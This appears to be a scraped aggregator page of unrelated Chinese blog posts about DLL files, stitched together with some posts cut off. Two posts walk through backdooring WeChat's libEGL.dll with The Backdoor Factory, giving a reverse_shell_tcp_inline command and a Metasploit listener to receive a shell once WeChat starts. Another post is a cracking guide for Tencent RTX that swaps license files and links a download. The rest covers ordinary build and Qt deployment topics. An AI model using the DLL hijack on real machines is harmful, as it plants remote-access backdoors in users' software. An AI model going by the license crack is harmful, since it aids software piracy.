dll文件

微信劫持反弹shell复现

北慕城南 提交于 2019-11-30 23:43:23
实验环境: win7 、 kali 实验工具:微信;BDF 劫持工具,可用于 DLL 注入; Process Explorer 任务管理工具,本实验中用于查找微信程序调用的 DLL 文件 在 win7 中安装微信 BDF 、 Process Explore 在 windows 启动 pe 、微信 在 pe 中找到 wechat 在 view 中找到 dlls 记住微信的安装路径,查看微信的 libEGL.dll 文件 回到 kali 执行 nautilus ./ 打开窗口 将 libEGL.dll 放在该文件路径下 执行命令处理 dll 文件 查看 backdoored 将处理后的 dll 文件通过 ftp 上传到 window 中 开启 postgresql 启用 msfconsole 使用 exploit 设置 payload 设置监听地址和端口,查看 在win7中打开微信,就能在kali中接受到反弹的shell 来源: https://www.cnblogs.com/shayanboy/p/11644960.html

10.9 利用微信dll反弹shell

ε祈祈猫儿з 提交于 2019-11-30 22:09:19
   header() 向用户的浏览器发送 HTTP 报头 echo”<meta charset=’UTF-8’/>”; header(“Content-Type:text/html;charset=utf-8”);// 解决编码问题 header(“location:http://www.hacker.com”);// 页面跳转 利用微信 dll 反弹 shell Win7 : 192.168.56.141 Kali : 192.168.56.139 打开 windows7 中的微信登录界面,不需要登录,再打开 Process Explorer 任务管理工具,招待微信所使用的 dll 文件 这里我们选择 libEGL.dll 文件,将其复制到 kali 的 the-backdoor-factory 目录中, 然后执行代码如下: python backdoor.py -f libEGL.dll -s reverse_shell_tcp_inline -P 8888 -H 192.168.56.139 其中, -f 表示被劫持的 DLL 文件, -s 表示 shell 的类型, -P 表示 DLL 要连接 远程主机的端口, -H 表示 DLL 连接的远程主机 可以看到生成文件已经存放在 backdoored 目录下 然后将该文件重新放置在 win7 的微信安装目录下覆盖 之后打开

未能将文件 bin\\zh-CHS\\Webdiyer.MvcPager.resources.dll 复制到 obj\\Release\\Package\\PackageTmp\\bin\\zh-CHS\\Webdiyer.MvcPager.resources.dll。 未能找到文件“bin\\zh-CHS\\Webdiyer.MvcPager.resources.dll”

佐手、 提交于 2019-11-30 21:38:21
在bin下面会生成更dll相同名称的xml文件,可能是因为我之前把项目中的很多部分设置了从项目中排除,关于dll也提示复制的问题解决办法是直接把那些生成的xml文件删除。 在发布时还会提示obj文件夹下面的错误如上述“未能将文件,,复制到。。”解决办法是把obj这个文件设置”从项目中排除“再次发布即可。 来源: https://www.cnblogs.com/niyl/p/11641339.html

RTX和谐说明

牧云@^-^@ 提交于 2019-11-30 20:53:24
1、下载安装原版RTX2015 2、打开“服务”,停止RTX开头的服务。 3、替换C:\Program Files\Tencent\RTXServer\License目录下的License.ini文件;替换C:\Program Files\Tencent\RTXServer\Bin目录下的License.dll文件、RtxLcsMgr.dll文件和LicenseServer.exe文件。 4、启动RTX相关服务。 链接:http://pan.baidu.com/s/1i5gd1K5 密码:pzbc 来源: https://www.cnblogs.com/Jeely/p/11639606.html

C++ 函数指针(涉及dll)

那年仲夏 提交于 2019-11-30 14:58:12
本篇参考资料: <Professional C++, 4th Edition> 在 上一章 中, 已经粗略的介绍了 智能指针 unique_ptr 如果觉得本章的内容不适合你, 可以看 C++指针知识点目录 同时在 指针基础部分 中, 提到了 指针是指向着一个地址 , 但是我们很容易产生一个问题: 函数也有地址, 那么 指针能否指向函数 ?---- 当然可以 如果你是 信息学竞赛的 , 没有必要了解(没有什么用处) 本篇是主要关于开发的 , 现在步入正题 在讲这个之前, 了解一下: dll 文件 我们也会发现, 在许多windows应用程序目录中, 都存在这个东西 请点开上面的链接, 了解一下 看完之后, 我们可以知道, 所谓 dll, 就是 将某些函数或功能( 比如说类) 封装于此 , 等着调用 如何调用?------ 指针 由于内容超过了要讨论的范围, 只做简单的解释: 比如说编写一个返回 string 的 "Hello World!": #ifndef _DLL_H_ #define _DLL_H_ #include <string> using std::string; #if BUILDING_DLL #define DLLIMPORT __declspec(dllexport) #else #define DLLIMPORT __declspec(dllimport)

Qt在window下的环境变量PATH的配置

不打扰是莪最后的温柔 提交于 2019-11-30 10:19:45
Qt在window下的环境变量PATH的配置 路劲: C:\Qt\Qt5.6.0\5.6\mingw49_32\bin C:\Qt\Qt5.6.0\Tools\mingw492_32\bin 发布Qt程序,如何找到缺少的dll 1,去目录:C:\Qt\Qt5.6.0\5.6\mingw49_32\bin 2,找到windeployqt.exe 3,先去你生成的exe的文件夹,在这个文件夹下,在cmd命令行里执行: windeployqt.exe 4,执行后,就会自动把缺少的dll拷贝到这个目录了。 5,注意,如果发布的是debug模式的化,拷贝过来的dll的size就会很大,拷贝过来的debug模式的d浏览文件的名字后面都有个d。如果是release模式的,拷贝过来的dll文件的size就很小了。 6,注意,现在是把qt里必要的dll都拷贝过来了,但是Windows的dll可能还是缺少,报缺少window的dll缺少的时候,就得去windows。 c/c++ 学习互助QQ群:877684253 本人微信:xiaoshitou5854 来源: https://www.cnblogs.com/xiaoshiwang/p/11578350.html

微信DLL劫持反弹shell复现

左心房为你撑大大i 提交于 2019-11-30 07:07:43
最近刚好在做PPT的dll劫持测试,现在就随便拿一个程序来练练手。增加一下熟练度。本测试纯属学习测试过程,不可用于非法操作!!! 一、测试环境 工具下载地址: (1)BDF,劫持工具,可用于DLL注入,https://github.com/cream492/the- backdoor-factory (2)ProcessExplorer https://process-explorer.en.softonic.com/任务管理工具,本实验中用于查找微信程序调用的 DLL 文件 二、测试过程 1 在 Win7 虚拟机中打开微信登录窗口,需要扫描登录的窗口即可;然 后开启 ProcessExplorer,在运行程序列表中找到微信,然后在菜单栏中找“View”—>“LowerPaneView”—>“DLLs”,或者 ctrl+d, 接下来可以看到微信登录页面调用的动态链接库 如下图所示 测试使用的DLL是libEGL.DLL 文件 理论在微信安装目录下其他的DLL文件都可以 有待测试 2 在kali 中下载 Backdoor - factory www.gendan5.com 执行 ./backdoor.py -h 出现测试安装是否成功 将 Win7 安装的微信程序目录中的 libEGL.dll 拷贝到 kali 系统中,放于 the-backdoor-factory 下,运行命令如下:

如何用 C++ 为 Python 写 dll

一个人想着一个人 提交于 2019-11-30 05:23:15
如何用 C++ 为 Python 写 dll 来自: http://zhongwei-leg.iteye.com/blog/693519 博客分类: C++ C C# C++ Python OS 1. 先新建一个名为 hello.cpp 的 C++ 源文件: Cpp代码 #include <stdio.h> #define DLLEXPORT extern "C" __declspec(dllexport) DLLEXPORT int __stdcall hello() { printf( "Hello world!\n" ); return 0; } #include <stdio.h> #define DLLEXPORT extern "C" __declspec(dllexport) DLLEXPORT int __stdcall hello() { printf("Hello world!\n"); return 0; } 2. 编译成 dll 文件: Cpp代码 cl /LD hello.cpp cl /LD hello.cpp 注意, 这里的参数是 /LD, 而不是 /DL。 3. 编写一个名为 hello.py 的 python 文件: Python代码 # coding: utf-8 import os import ctypes CUR_PATH = os

项目搭建(三):自定义DLL

大兔子大兔子 提交于 2019-11-30 03:45:14
说明:程序中有些自定义的控件类型在TestStack.White框架中没有涉及,需要引入自定义的DLL 使用:将自定义的ClassLibrary2.dll拷贝到项目/bin/debug目录下,项目添加引用选择dll。 --该dll定义了Control Patterns为空的点击事件类BaseClass; --该dll定义了查找控件属性类PropertyConditions; 一、 C#生成DLL文件 1. 在VS2015,文件->新建项目->项目类型visual C#->类库(注意必须是类库) --即新建一个由纯.cs 类库文件组成的程序集。 2. 编写代码 详细代码见附录: -文件名:Class1.cs -namespace:BaseTest -类名:BaseClass 3. 生成->生成[解决方案名] 这样你的\Projects\ClassLibrary2\ClassLibrary2\bin\Debug文件夹或者\Projects\ClassLibrary2\ClassLibrary2\obj\Debug文件夹里便会自动生成 dll文件,该文件名称与项目名称一致,即为ClassLibrary2.dll。 二、引用DLL文件 a. 首先把dll文件放到应用程序...\bin\Debug\下; b. 然后在解决方案中添加引用:右键鼠标-->添加引用-->浏览--

.dll与.lib的关系总结

泪湿孤枕 提交于 2019-11-29 22:42:28
环境:Win10 Vs2015 Debug+x64 新建一个C++的空项目 项目属性里首先配置好目标类型(.dll),再配置输出.lib和.dll的文件夹 .dll文件需要有一个函数入口,DllMain(),只需要build即可得到需要.lib和.dll文件 //Function.h #pragma once extern "C" _declspec(dllexport) void test(); //Function.cpp #include"Function.h" #include <iostream> using namespace std; void test() { cout << "Hello World" << endl; } //TestDll.cpp #include<Windows.h> using namespace std; BOOL APIENTRY DllMain(HANDLE hModulce, DWORD ul_reason_for_call, LPVOID lpReaserved) { return TRUE; } .lib有两种类型,一种是静态链接库(Static Link Library),它里面是函数实现的代码,是编译完很多个.obj的集合,使用时直接链接到主程序一起写进.exe(.dll)中,还有一种是动态链接库(Dynamic Link